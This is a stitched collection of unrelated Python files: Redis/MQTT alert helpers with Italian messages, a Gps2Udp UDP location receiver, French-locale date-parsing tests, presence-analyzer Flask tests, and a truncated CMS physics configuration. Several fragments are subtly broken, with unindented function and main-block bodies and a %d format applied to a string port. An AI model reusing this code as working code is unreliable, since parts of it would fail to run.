    :return: True when the connection succeeds, False otherwise.
    """
    s = socket.socket()
    try:
        s.connect((Hostname, Port))
    except socket.error as msg:
        print("Non ho trovato/non mi collego a %s:%d.\nIl messaggio d\'errore e`: %s" % (Hostname, Port, msg))
        return False
    else:
        return True
    finally:
        # BUGFIX: the original never closed the socket, leaking a file
        # descriptor on every call.
        s.close()
## Send an alert/alarm to the Redis message server.
## Connection parameters are stored in the local DB under the
## "redis:server:message" hash.
# database, message id, type, description, value, unit of measure, date
# DB, msg:{pc}:{id}:<date&time>, <alert/alarm>, Description, Value, Unit, Date
def InviaAvviso(DB, MsgID, Type, Desc, Value, UM, Date):
    """Store an alert message on the remote Redis message server."""
    Hostname = Decode(DB.hget("redis:server:message", "hostname"))
    Port = Decode(DB.hget("redis:server:message", "port"))
    Database = Decode(DB.hget("redis:server:message", "database"))
    Password = Decode(DB.hget("redis:server:message", "password"))
    # Guard clause: bail out early when the server is unreachable.
    if not NetCheck(Hostname, int(Port)):
        print ("Non posso inviare l\'avviso a \"%s:%d\".\n" % (Hostname, Port))
        return
    MyMsgDB = OpenDB(Hostname, Port, Database, Password)
    payload = {"type": Type, "desc": Desc, "value": Value, "um": UM, "date": Date}
    MyMsgDB.hmset(MsgID, payload)
# Helper to build alert-message identifiers, saving some typing.
# Compact timestamp [0], human-readable date [1]
def AlertsID():
    """Return (compact timestamp, readable timestamp) for message IDs.

    Both values are derived from a single localtime() snapshot: the
    original called localtime() twice, so the two strings could disagree
    when the calls straddled a second boundary.
    """
    now = time.localtime()
    MsgIDate = time.strftime("%Y%m%d%H%M%S", now)
    #MsgType="alert"
    MsgDate = time.strftime("%Y/%m/%d %H:%M:%S", now)
    return MsgIDate, MsgDate
## Send data to the MQTT broker (Mosquitto).
# This is the signature in the paho-mqtt library:
# def single(topic, payload=None, qos=0, retain=False, hostname="localhost",
#     port=1883, client_id="", keepalive=60, will=None, auth=None,
#     tls=None, protocol=paho.MQTTv311, transport="tcp"):
# Only topic and payload are passed explicitly; the remaining settings
# come from the configuration stored in Redis under
# "mqttbroker:server:message". DB must be passed in by the caller.
def InviaMqttData(DB,Topic,Payload):
    """Publish Payload on Topic using broker settings read from Redis."""
    Hostname=Decode(DB.hget("mqttbroker:server:message","hostname"))
    Port=int(Decode(DB.hget("mqttbroker:server:message","port")))
    User=Decode(DB.hget("mqttbroker:server:message","user"))
    Password=Decode(DB.hget("mqttbroker:server:message","password"))
    if User == "" or Password == "":
        # NOTE(review): this sends the literal credentials 'none'/'none';
        # paho expects auth=None to mean "no authentication" -- confirm the
        # broker actually accepts these placeholder credentials.
        Auth= {'username':'none', 'password':'none'}
    else:
        Auth= { 'username' : User , 'password' : Password } # still to be verified ***
    if NetCheck(Hostname,Port):
        publish.single(Topic, Payload, hostname=Hostname, port=Port, auth=Auth)
    else:
        print ("Non posso trasmettere a \"%s:%s\".\n" % (Hostname,Port))
|
#!/usr/bin/env python
"""
Receive Geo location data from the Gps2Udp Android application
via UDP/IP and forward them to the stdout line by line.
There is some requirements to a valid incoming packet:
- it must be of form: TIMESTAMP LATITUDE LONGITUDE ACCURACY [other fields];
- TIMESTAMP is a Unix timestamp (seconds since 1 Jan 1970);
- the diff between TIMESTAMP and local time must be less
than MAX_TIME_DIFF (definition of the MAX_TIME_DIFF variable see below);
- TIMESTAMP must be greater than timestamp of a previous valid packet;
- LATITUDE is a float between [-90.0..90.0];
- LONGITUDE is a float between [-180.0..180.0];
- ACCURACY is an integer between [0..MAX_ACCURACY] (definition of
MAX_ACCURACY variable see below).
If any of the requirements are not met, the packet will be silently ignored.
When started with --signed command line option, an extra field must
be defined in each incoming UDP packet - DIGEST. With the field common
packet format must be of form:
TIMESTAMP LATITUDE LONGITUDE ACCURACY DIGEST
DIGEST - is a SHA1 from "TIMESTAMP LATITUDE LONGITUDE ACCURACY" + secret
string known only by Gps2Udp client (Android app) and the server. The
server reads the secret from GPS2UDP_SECRET environment variable.
Important notes. When in --signed mode:
- any packet without the digest will be ignored;
- any packet with digest not matched with digest calculated on the
server side, will be ignored;
- if the secret is not defined (GPS2UDP_SECRET environment variable is not
set or empty), no packets will be matched as valid.
"""
import getopt
import hashlib
import os
import os.path
import socket
import sys
import time
# UDP port to listen on when --port is not given.
DEFAULT_PORT = 5000
# Maximum time difference between a timestamp in a packet and
# the local Unix timestamp (in seconds).
MAX_TIME_DIFF = 60 * 5
# Maximum valid accuracy value (in meters).
MAX_ACCURACY = 10000 # 10km
# Here will be stored the timestamp of the last valid packet received.
# The timestamp will be used later to avoid receiving data from the past.
# Mutated by parse_packet() via a ``global`` statement.
LAST_TIMESTAMP = None
def usage(exitcode = 1):
    """
    Show usage info and exit.

    :param exitcode: process exit status to terminate with
    """
    argv0 = os.path.basename(sys.argv[0])
    # Parenthesised single-argument print works under both Python 2 and 3;
    # the original Python-2-only print statements broke py3 compilation.
    print('Usage: {0} [options]'.format(argv0))
    print(' Options:')
    print(' --signed check every UDP packet for digital signature;')
    print(' --port=N UDP port number to listen. Default is 5000.')
    sys.exit(exitcode)
def main():
    """
    Entry point: parse command line options, then receive UDP packets
    forever, writing each valid one to stdout as a single line.
    """
    try:
        cmd_opts, _cmd_args = getopt.getopt(
            sys.argv[1:], '', ['port=', 'signed'])
    except getopt.GetoptError as exc:
        sys.stderr.write('Error: ' + str(exc) + '\n')
        # usage() exits the process with a non-zero status.
        usage()
    cmd_opts = dict(cmd_opts)
    port = int(cmd_opts.get('--port', str(DEFAULT_PORT)))
    signed = '--signed' in cmd_opts
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Bind on all interfaces.
    sock.bind(('', port))
    while True:
        # 100 bytes is enough for the "TIMESTAMP LAT LON ACC [DIGEST]" line.
        data, _addr = sock.recvfrom(100)
        try:
            result = parse_packet(data, signed)
        except PacketParseError:
            # Invalid packets are silently ignored by design (see module doc).
            continue
        sys.stdout.write(format_packet(result))
        sys.stdout.flush()
class PacketParseError(Exception):
    """Raised when an incoming packet is malformed or fails validation."""
def parse_packet(data, signed = False):
    """
    Parse and check incoming packet.
    The packet must be of form:
        TIMESTAMP LATITUDE LONGITUDE ACCURACY [DIGEST]

    :param data: packet body
    :type data: string
    :param signed: if True, the packet will be checked for a
           valid digital signature
    :type signed: boolean
    :rtype: dict
    :raises PacketParseError: on any malformed or invalid packet
        (missing fields, bad signature, stale/duplicate timestamp,
        out-of-range coordinates or accuracy)
    """
    global LAST_TIMESTAMP
    result = {}
    # Split on spaces, dropping empty tokens from repeated separators.
    tokens = [elem for elem in data.strip().split(' ') if elem]
    if signed:
        # check the signature
        if len(tokens) < 5:
            raise PacketParseError
        payload = ' '.join(tokens[:4])
        digest = tokens[4]
        secret = os.environ.get('GPS2UDP_SECRET')
        if secret is None or len(secret) == 0:
            # secret is not defined => unable to check
            raise PacketParseError
        hasher = hashlib.sha1()
        # NOTE(review): str concatenation works for Python 2; under
        # Python 3 sha1.update() requires bytes -- confirm target runtime.
        hasher.update(payload + secret)
        if hasher.hexdigest() != digest:
            # digital signature mismatch
            raise PacketParseError
    else:
        # check tokens count
        if len(tokens) < 4:
            raise PacketParseError
    # parse the tokens
    try:
        result['timestamp'] = int(tokens[0])
        result['latitude'] = float(tokens[1])
        result['longitude'] = float(tokens[2])
        result['accuracy'] = int(tokens[3])
    except ValueError:
        raise PacketParseError
    # check timestamp
    time_diff = abs(result['timestamp'] - int(time.time()))
    if time_diff > MAX_TIME_DIFF:
        # the timestamp differs from NOW for more than 5 minutes
        raise PacketParseError
    if LAST_TIMESTAMP is not None:
        if result['timestamp'] <= LAST_TIMESTAMP:
            # the timestamp is not greater than the previous timestamp
            raise PacketParseError
    # check lat&long values
    if not (-90.0 <= result['latitude'] <= 90.0):
        raise PacketParseError
    if not (-180.0 <= result['longitude'] <= 180.0):
        raise PacketParseError
    # check accuracy value
    if result['accuracy'] < 0 or result['accuracy'] > MAX_ACCURACY:
        raise PacketParseError
    # All checks is passed => packet is valid.
    # Save the timestamp in global var (makes replayed packets invalid):
    LAST_TIMESTAMP = result['timestamp']
    return result
def format_packet(data):
    """
    Format received packet for the stdout.

    :param data: packet data
    :type data: dict
    :rtype: string
    """
    fields = (
        str(data['timestamp']),
        format(data['latitude'], '.7f'),
        format(data['longitude'], '.7f'),
        str(data['accuracy']),
    )
    return ' '.join(fields) + '\n'
if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop the receiver; exit quietly
        # with a non-zero status instead of printing a traceback.
        sys.exit(1)
|
#!/usr/bin/env python
"""
Test parsing of simple date and times using the French locale
Note: requires PyICU
"""
import unittest, time, datetime
import parsedatetime.parsedatetime as pt
import parsedatetime.parsedatetime_consts as ptc
# a special compare function is used to allow us to ignore the seconds as
# the running of the test could cross a minute boundary
def _compareResults(result, check):
target, t_flag = result
value, v_flag = check
t_yr, t_mth, t_dy, t_hr, t_min, _, _, _, _ = target
v_yr, v_mth, v_dy, v_hr, v_min, _, _, _, _ = value
return ((t_yr == v_yr) and (t_mth == v_mth) and (t_dy == v_dy) and
(t_hr == v_hr) and (t_min == v_min)) and (t_flag == v_flag)
class test(unittest.TestCase):
    """Locale-dependent parse tests for the fr_FR locale.

    Every test body is guarded by ``if self.ptc.localeID == 'fr_FR'`` so
    the suite silently does nothing when PyICU resolves a different locale.
    """

    def setUp(self):
        # Constants built with PyICU so French month/day names are available.
        self.ptc = ptc.Constants('fr_FR', usePyICU=True)
        self.cal = pt.Calendar(self.ptc)
        # Snapshot of "now", used to build start/target timetuples.
        self.yr, self.mth, self.dy, self.hr, self.mn, self.sec, self.wd, self.yd, self.isdst = time.localtime()

    def testTimes(self):
        # Times of day: HHMM, HH:MM and HHMMSS forms.
        if self.ptc.localeID == 'fr_FR':
            start = datetime.datetime(self.yr, self.mth, self.dy, self.hr, self.mn, self.sec).timetuple()
            target = datetime.datetime(self.yr, self.mth, self.dy, 23, 0, 0).timetuple()
            self.assertTrue(_compareResults(self.cal.parse('2300', start), (target, 2)))
            self.assertTrue(_compareResults(self.cal.parse('23:00', start), (target, 2)))
            target = datetime.datetime(self.yr, self.mth, self.dy, 11, 0, 0).timetuple()
            self.assertTrue(_compareResults(self.cal.parse('1100', start), (target, 2)))
            self.assertTrue(_compareResults(self.cal.parse('11:00', start), (target, 2)))
            target = datetime.datetime(self.yr, self.mth, self.dy, 7, 30, 0).timetuple()
            self.assertTrue(_compareResults(self.cal.parse('730', start), (target, 2)))
            self.assertTrue(_compareResults(self.cal.parse('0730', start), (target, 2)))
            target = datetime.datetime(self.yr, self.mth, self.dy, 17, 30, 0).timetuple()
            self.assertTrue(_compareResults(self.cal.parse('1730', start), (target, 2)))
            self.assertTrue(_compareResults(self.cal.parse('173000', start), (target, 2)))

    def testDates(self):
        # Dates in dd/mm/yyyy form and with the French month name (août).
        if self.ptc.localeID == 'fr_FR':
            start = datetime.datetime(self.yr, self.mth, self.dy, self.hr, self.mn, self.sec).timetuple()
            target = datetime.datetime(2006, 8, 25, self.hr, self.mn, self.sec).timetuple()
            self.assertTrue(_compareResults(self.cal.parse('25/08/2006', start), (target, 1)))
            self.assertTrue(_compareResults(self.cal.parse('25/8/06', start), (target, 1)))
            self.assertTrue(_compareResults(self.cal.parse(u'ao\xfbt 25, 2006', start), (target, 1)))
            self.assertTrue(_compareResults(self.cal.parse(u'ao\xfbt 25 2006', start), (target, 1)))
            # A yearless date that already passed this year resolves to
            # next year.
            if self.mth > 8 or (self.mth == 8 and self.dy > 25):
                target = datetime.datetime(self.yr+1, 8, 25, self.hr, self.mn, self.sec).timetuple()
            else:
                target = datetime.datetime(self.yr, 8, 25, self.hr, self.mn, self.sec).timetuple()
            self.assertTrue(_compareResults(self.cal.parse('25/8', start), (target, 1)))
            self.assertTrue(_compareResults(self.cal.parse('25/08', start), (target, 1)))

    def testWeekDays(self):
        # Each short weekday name must parse back to that weekday.
        if self.ptc.localeID == 'fr_FR':
            start = datetime.datetime(self.yr, self.mth, self.dy, self.hr, self.mn, self.sec).timetuple()
            o1 = self.ptc.CurrentDOWParseStyle
            o2 = self.ptc.DOWParseStyle
            # set it up so the current dow returns current day
            self.ptc.CurrentDOWParseStyle = True
            self.ptc.DOWParseStyle = 1
            for i in range(0,7):
                dow = self.ptc.shortWeekdays[i]
                result = self.cal.parse(dow, start)
                yr, mth, dy, hr, mn, sec, wd, yd, isdst = result[0]
                self.assertTrue(wd == i)
            # Restore the parse-style options for other tests.
            self.ptc.CurrentDOWParseStyle = o1
            self.ptc.DOWParseStyle = o2
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Presence analyzer unit tests.
"""
import os.path
import json
import datetime
import unittest
from mock import patch
from random import randint
from presence_analyzer import main, views, utils, decorators, helpers
CURRENT_PATH = os.path.dirname(__file__)
TEST_DATA_CSV = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'test_data.csv'
)
BAD_TEST_DATA_CSV = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'bad_test_data.csv'
)
TEST_DATA_XML = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'test_users.xml'
)
BAD_TEST_DATA_XML = os.path.join(
CURRENT_PATH, '..', '..', 'runtime', 'data', 'bad_test_users.xml'
)
VALID_HTML_MIME = ('text/html', 'text/html; charset=utf-8')
# pylint: disable=E1103
class PresenceAnalyzerViewsTestCase(unittest.TestCase):
    """
    Views tests.
    Exercises the Flask endpoints against the known contents of
    ``test_data.csv`` / ``test_users.xml``; the expected counts and values
    below are tied to those fixture files.
    """
    def setUp(self):
        """
        Before each test, set up an environment.
        """
        # Point the app at the test fixtures before creating the client.
        main.app.config.update({'DATA_CSV': TEST_DATA_CSV})
        main.app.config.update({'DATA_XML': TEST_DATA_XML})
        self.client = main.app.test_client()
    def tearDown(self):
        """
        Get rid of unused objects after each test.
        """
        pass
    def test_mainpage(self):
        """
        Test main page redirect.
        """
        resp = self.client.get('/')
        self.assertEqual(resp.status_code, 302)
        assert resp.headers['Location'].endswith('/presence_weekday.html')
    def test_api_users(self):
        """
        Test users listing.
        """
        resp = self.client.get('/api/v1/users')
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        self.assertEqual(len(data), 9)
        self.assertDictEqual(
            data[0],
            {u'avatar': u'https://intranet.stxnext.pl:443/api/images/users/36',
             u'name': u'Anna W.', u'user_id': 36}
        )
    def test_presence_start_end_view(self):
        """
        Test user presence start-end view
        """
        url = '/api/v1/presence_start_end/%d'
        user_id = 11
        resp = self.client.get(url % user_id)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        # Fixture user 11 yields five weekday rows of (day, start, end).
        self.assertEqual(len(data), 5)
        self.assertEqual(len(data[0]), 3)
        self.assertTrue('Mon' in data[0])
    @patch.object(views.log, 'debug')
    def test_presence_start_end_view_log(self, mock_logger):
        """
        Test user presence start-end view for non-existing user
        """
        url = '/api/v1/presence_start_end/%d'
        user_id = 112312
        resp = self.client.get(url % user_id)
        # Unknown users are reported via log.debug, not an error status.
        mock_logger.assert_called_once_with('User %s not found!', user_id)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
    def test_mean_time_weekday_view(self):
        """
        Test daily mean time for user
        """
        base_url = '/api/v1/mean_time_weekday/%d'
        resp = self.client.get(base_url % 10)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        # One [weekday, mean-seconds] pair per day of the week.
        self.assertEqual(len(data), 7)
        self.assertListEqual(data[1], [u'Tue', 30047.0])
        self.assertListEqual(data[6], [u'Sun', 0])
        resp = self.client.get(base_url % 11)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        self.assertEqual(len(data), 7)
        self.assertListEqual(data[2], [u'Wed', 25321.0])
        self.assertListEqual(data[6], [u'Sun', 0])
    @patch.object(views.log, 'debug')
    def test_mean_time_weekday_view_log(self, mock_logger):
        """
        Checks if log.debug is called when requesting for non-existing user
        """
        user_id = 31111111111111111
        resp = self.client.get('/api/v1/mean_time_weekday/%d' % user_id)
        mock_logger.assert_called_once_with('User %s not found!', user_id)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        self.assertEqual(data, [])
    def test_get_start_end_mean_time(self):
        """
        Test calculating start-end mean time
        """
        users_data = utils.get_data()
        user_mean_time_10 = utils.get_start_end_mean_time(users_data[10])
        user_mean_time_11 = utils.get_start_end_mean_time(users_data[11])
        self.assertEqual(len(user_mean_time_10), 3)
        self.assertEqual(len(user_mean_time_11), 5)
        # Each row is a (weekday-name, mean-start, mean-end) tuple.
        self.assertIsInstance(user_mean_time_11[0], tuple)
        self.assertIsInstance(user_mean_time_11[4], tuple)
        self.assertIsInstance(user_mean_time_10[2], tuple)
        self.assertIsInstance(user_mean_time_11[2][0], str)
        self.assertIsInstance(user_mean_time_11[3][1], int)
        self.assertIsInstance(user_mean_time_11[1][2], int)
        # time value is in milliseconds
        for row in user_mean_time_10:
            self.assertTrue(0 <= row[1] < 24*60*60*1000,
                            msg="User#10, row data: %s" % str(row))
            self.assertTrue(0 <= row[2] < 24*60*60*1000,
                            msg="User#10, row data: %s" % str(row))
        for row in user_mean_time_11:
            self.assertTrue(0 <= row[1] < 24*60*60*1000,
                            msg="User#11, row data: %s" % str(row))
            self.assertTrue(0 <= row[2] < 24*60*60*1000,
                            msg="User#11, row data: %s" % str(row))
        self.assertEqual(user_mean_time_10[1][0], "Wed")
        self.assertEqual(user_mean_time_10[0][1], 34745000)
        self.assertEqual(user_mean_time_10[1][2], 58057000)
        self.assertEqual(user_mean_time_11[1][1], 33590000)
        self.assertEqual(user_mean_time_11[1][2], 50154000)
        self.assertEqual(user_mean_time_11[3][1], 35602000)
        self.assertEqual(user_mean_time_11[4][2], 54242000)
    def test_presence_weekday_view(self):
        """
        Test daily user presence
        """
        base_url = '/api/v1/presence_weekday/%d'
        resp = self.client.get(base_url % 10)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        # Header row plus one row per weekday = 8 entries.
        self.assertEqual(len(data), 8)
        self.assertListEqual(data[0], [u'Weekday', u'Presence (s)'])
        self.assertListEqual(data[2], [u'Tue', 30047.0])
        self.assertListEqual(data[6], [u'Sat', 0])
        resp = self.client.get(base_url % 11)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        self.assertEqual(len(data), 8)
        self.assertListEqual(data[0], [u'Weekday', u'Presence (s)'])
        self.assertListEqual(data[4], [u'Thu', 45968])
        self.assertListEqual(data[6], [u'Sat', 0])
    @patch.object(views.log, 'debug')
    def test_presence_weekday_view_log(self, mock_logger):
        """
        Test daily user presence for non-existing user
        """
        user_id = 31111111111111111
        resp = self.client.get('/api/v1/presence_weekday/%d' % user_id)
        mock_logger.assert_called_once_with('User %s not found!', user_id)
        self.assertEqual(resp.status_code, 200)
        self.assertEqual(resp.content_type, 'application/json')
        data = json.loads(resp.data)
        self.assertEqual(data, [])
    def test_template_view(self):
        """
        Test template_view view
        """
        resp = self.client.get('/presence_weekday.html')
        self.assertEqual(resp.status_code, 200)
        self.assertIn(resp.content_type, VALID_HTML_MIME)
        # NOTE(review): no leading slash here -- presumably the test client
        # resolves it relative to '/'; confirm this is intentional.
        resp = self.client.get('mean_time_weekday.html')
        self.assertEqual(resp.status_code, 200)
        self.assertIn(resp.content_type, VALID_HTML_MIME)
        # Unknown templates must 404 but still render an HTML error page.
        resp = self.client.get('/presence_weekday_asdasd.html')
        self.assertEqual(resp.status_code, 404)
        self.assertIn(resp.content_type, VALID_HTML_MIME)
class PresenceAnalyzerUtilsTestCase(unittest.TestCase):
    """
    Utility functions tests.
    Runs against the ``test_data.csv`` / ``test_users.xml`` fixtures; the
    expected keys and values below are tied to those files.
    """
    def setUp(self):
        """
        Before each test, set up an environment.
        """
        main.app.config.update({'DATA_CSV': TEST_DATA_CSV})
        main.app.config.update({'DATA_XML': TEST_DATA_XML})
    def tearDown(self):
        """
        Get rid of unused objects after each test.
        """
        pass
    def test_get_data(self):
        """
        Test parsing of CSV file.
        """
        data = utils.get_data()
        self.assertIsInstance(data, dict)
        self.assertItemsEqual(data.keys(), [10, 11])
        sample_date = datetime.date(2013, 9, 10)
        self.assertIn(sample_date, data[10])
        self.assertItemsEqual(data[10][sample_date].keys(), ['start', 'end'])
        self.assertEqual(data[10][sample_date]['start'],
                         datetime.time(9, 39, 5))
    def test_group_by_weekday(self):
        """
        Test grouping by weekday.
        """
        data = utils.get_data()
        user_10 = utils.group_by_weekday(data[10])
        # All seven weekdays are present as keys, even without data (Mon=0).
        self.assertEqual(len(user_10), 7)
        self.assertIsInstance(user_10, dict)
        for i in xrange(7):
            self.assertIn(i, user_10, "Iteration with i=%d" % i)
            self.assertIsInstance(user_10[i], list)
        self.assertEqual(user_10[0], [])
        self.assertIsInstance(user_10[1][0], int)
    def test_mean(self):
        """
        Test calculation of mean.
        """
        # Empty input must yield the int 0, not raise ZeroDivisionError.
        self.assertEqual(utils.mean([]), 0)
        self.assertIsInstance(utils.mean([]), int)
        self.assertIsInstance(utils.mean([1, 2, 3]), float)
        self.assertEqual(utils.mean([1, 2, 3]), 2)
        # BUG FIX: xrange(-100, 101, -1) is EMPTY (negative step with
        # start < stop), so the original assertion only re-tested the
        # empty-list case.  An ascending -100..100 range sums to 0.
        self.assertEqual(utils.mean([a for a in xrange(-100, 101)]), 0)
        self.assertEqual(utils.mean(
            [123, 234, 345, 456, 567, 678, 789, 890]), 510.25)
        # mean(1..j-1) == j/2.0 for random range lengths.
        for j in [randint(2, 123) for _ in xrange(randint(2, 123))]:
            self.assertEqual(utils.mean(xrange(1, j)), j/2.0,
                             "Iteration with: a=%s" % j)
    def test_seconds_since_midnight(self):
        """
        Test seconds since midnight calculation.
        """
        self.assertEqual(utils.seconds_since_midnight(
            datetime.datetime(1, 1, 1)), 0)
        self.assertIsInstance(utils.seconds_since_midnight(
            datetime.datetime(1, 1, 1)), int)
        self.assertEqual(utils.seconds_since_midnight(
            datetime.datetime(1, 1, 1)), 0)
        self.assertEqual(utils.seconds_since_midnight(
            datetime.time(0, 0, 1)), 1)
        self.assertEqual(utils.seconds_since_midnight(
            datetime.time(12, 0, 0)), 43200)
    def test_interval(self):
        """
        Test interval calculation.
        """
        time_delta = datetime.timedelta(hours=4)
        # Plain decimal literals; the original zero-padded '05'/'04' were
        # Python 2 octal-style literals of equal value, but a syntax error
        # in Python 3.
        dd1 = datetime.datetime(2013, 5, 1, 12, 5, 4)
        self.assertIsInstance(utils.interval(dd1-time_delta, dd1), int)
        self.assertEqual(utils.interval(dd1-time_delta, dd1),
                         time_delta.seconds)
        # Interval crossing midnight backwards comes out negative.
        dd2 = datetime.datetime(2013, 5, 1, 1, 5, 4)
        self.assertEqual(utils.interval(dd2-time_delta, dd2),
                         time_delta.seconds-24*60*60)
        dt_now = datetime.datetime.now()
        self.assertEqual(utils.interval(dt_now, dt_now), 0)
        dd3 = datetime.time(12, 45, 34)
        dd4 = datetime.time(11, 45, 34)
        self.assertEqual(utils.interval(dd4, dd3), 60*60)
    def test_get_user(self):
        """
        Test for reading data from users.xml.
        """
        users = utils.get_users()
        users_items = users.items()
        self.assertEqual(len(users), 9)
        self.assertIsInstance(users, dict)
        self.assertIsInstance(users[122], dict)
        self.assertIn(36, users)
        self.assertIn(122, users)
        self.assertIsInstance(users[122], dict)
        # NOTE(review): dict items() ordering is arbitrary; this only holds
        # because every user entry has exactly two fields.
        self.assertEqual(len(users_items[1][1]), 2)
class PresenceAnalyzerUtilsWithBadDataTestCase(unittest.TestCase):
    """
    Utility functions tests against fixtures with malformed entries.
    """
    def setUp(self):
        """
        Before each test, set up an environment.
        """
        # Reload to reset module state (e.g. caches) between test classes.
        reload(decorators)
        reload(utils)
        main.app.config.update({'DATA_CSV': BAD_TEST_DATA_CSV})
        main.app.config.update({'DATA_XML': BAD_TEST_DATA_XML})
    def tearDown(self):
        """
        Get rid of unused objects after each test.
        """
        pass
    @patch.object(utils.log, 'debug')
    def test_get_data(self, mock_logger):
        """
        Test parsing of CSV file with bad entries.
        Broken lines must be skipped with a log.debug message rather than
        aborting the parse.
        """
        data = utils.get_data()
        msg = 'Problem with line %d: '
        # BUG FIX: 'assert_call_with' is not a Mock assertion method -- it
        # silently created a child mock, so these checks never ran.  Use
        # assert_any_call, which verifies the call happened at some point.
        mock_logger.assert_any_call(msg, 3, exc_info=True)
        mock_logger.assert_any_call(msg, 8, exc_info=True)
        self.assertIsInstance(data, dict)
        self.assertItemsEqual(data.keys(), [10, 11])
        self.assertEqual(len(data), 2)
        # Nine valid rows survive across both users.
        self.assertEqual(len(data[10])+len(data[11]), 9)
    def test_get_user(self):
        """
        Test for reading data from users.xml with bad entries.
        """
        # Malformed XML is expected to surface as an AttributeError.
        with self.assertRaises(AttributeError):
            utils.get_users()
class PresenceAnalyzerDecoratorsTestCase(unittest.TestCase):
    """
    Decorators functions tests.
    """
    def setUp(self):
        """
        Before each test, set up an environment.
        """
        # Reload so the cache decorator starts empty for this test class.
        reload(decorators)
        main.app.config.update({'DATA_CSV': TEST_DATA_CSV})
        main.app.config.update({'DATA_XML': TEST_DATA_XML})
    @patch.object(decorators.log, 'debug')
    def test_get_data(self, mock_logger):
        """
        Test cache decorator: the first call populates the cache, the
        second is served from it, and both calls return equal data.
        """
        refresh_msg = 'Refreshing cache for %s'
        retrieve_msg = 'Retrieving from cache %s'
        data1 = utils.get_data()
        key = helpers.generate_cache_key(utils.get_data, (), {})
        # BUG FIX: 'assert_call_with' is not a Mock assertion method; the
        # original checks were silent no-ops.  assert_any_call actually
        # verifies the logging happened.
        # NOTE(review): assumes the decorator logs the pre-formatted
        # message; switch to the lazy ('%s', key) form if it does not.
        mock_logger.assert_any_call(refresh_msg % key)
        data2 = utils.get_data()
        mock_logger.assert_any_call(retrieve_msg % key)
        self.assertEqual(data1, data2)
class PresenceAnalyzerHelpersTestCase(unittest.TestCase):
    """
    Helpers functions tests.
    """
    def test_generate_cache_key(self):
        """
        Test generating cache key.
        Keys combine the function's dotted name with hashes of the
        positional and keyword arguments.
        """
        cases = [
            ((utils.get_users, (), {}),
             'presence_analyzer.utils.get_users:3527539:133156838395276'),
            ((utils.get_data, (), {}),
             'presence_analyzer.utils.get_data:3527539:133156838395276'),
            ((utils.interval, (12, 32), {}),
             'presence_analyzer.utils.interval:3713076219329978631:'
             '133156838395276'),
            ((utils.interval, (), {'end': 12, 'start': 32}),
             'presence_analyzer.utils.interval:3527539:'
             '5214707252506937883'),
        ]
        for (func, args, kwargs), expected in cases:
            self.assertEqual(
                helpers.generate_cache_key(func, args, kwargs), expected)
def suite():
    """
    Default test suite.
    Returns a TestSuite aggregating every test case class in this module.
    """
    test_suite = unittest.TestSuite()
    test_suite.addTest(unittest.makeSuite(PresenceAnalyzerViewsTestCase))
    test_suite.addTest(unittest.makeSuite(PresenceAnalyzerUtilsTestCase))
    test_suite.addTest(unittest.makeSuite(
        PresenceAnalyzerUtilsWithBadDataTestCase))
    test_suite.addTest(unittest.makeSuite(PresenceAnalyzerDecoratorsTestCase))
    # BUG FIX: the helpers tests were defined but never added to the suite.
    test_suite.addTest(unittest.makeSuite(PresenceAnalyzerHelpersTestCase))
    return test_suite
if __name__ == '__main__':
unittest.main()
|
import FWCore.ParameterSet.Config as cms
# cmsRun configuration: re-reconstruct pixel/strip hits and fill the
# PixelTree/StripTree ntuples (EPOS MC sample, 0T field, 2015 dN/deta setup).
process = cms.Process("myRECO")
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load("Configuration.StandardSequences.Services_cff")
process.load("Configuration.StandardSequences.MagneticField_0T_cff")
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load("Configuration.StandardSequences.Reconstruction_cff")
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.load("RecoVertex.BeamSpotProducer.BeamSpot_cfi")
# Timing service
process.Timing = cms.Service("Timing")
# MC Globaltag for 2015 dN/deta analysis
process.GlobalTag.globaltag = 'MCRUN2_74_V8::All'
# Cluster-based pixel vertexing (no tracking needed).
process.pixelVertexFromClusters = cms.EDProducer('PixelVertexProducerClusters')
# -1: process every event in the input file.
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
process.source = cms.Source("PoolSource",
    # replace 'myfile.root' with the source file you want to use
    fileNames = cms.untracked.vstring(
#        'file:RelVal_MinBias_13TeV_28478DD9-99A9-E411-891C-0025905B861C.root'
        #'file:step3_RAW2DIGI_L1Reco_RECO.root'
        'file:step3_EPOS_100k.root'
        #'RelValMinBias_314_STARTUP31X_V2-v1-Reco.root'
    )
)
# Centrality
process.load("RecoHI.HiCentralityAlgos.pACentrality_cfi")
process.pACentrality.producePixelTracks = cms.bool(False)
#process.pACentrality.produceTracks = cms.bool(False)
# Centrality Binning
process.load("RecoHI.HiCentralityAlgos.CentralityBin_cfi")
process.centralityBin.Centrality = cms.InputTag("pACentrality")
process.centralityBin.centralityVariable = cms.string("HFtowers")
process.centralityBin.nonDefaultGlauberModel = cms.string("HydjetDrum5")
# Add the HeavyIon Record: it is for PbPb cent binning, so we shoud not
# trust the centrality bin and only use the variables from the centrality
# provider
process.GlobalTag.toGet.extend([
    cms.PSet(record = cms.string("HeavyIonRcd"),
        tag = cms.string("CentralityTable_HFtowers200_HydjetDrum5_v740x01_mc"),
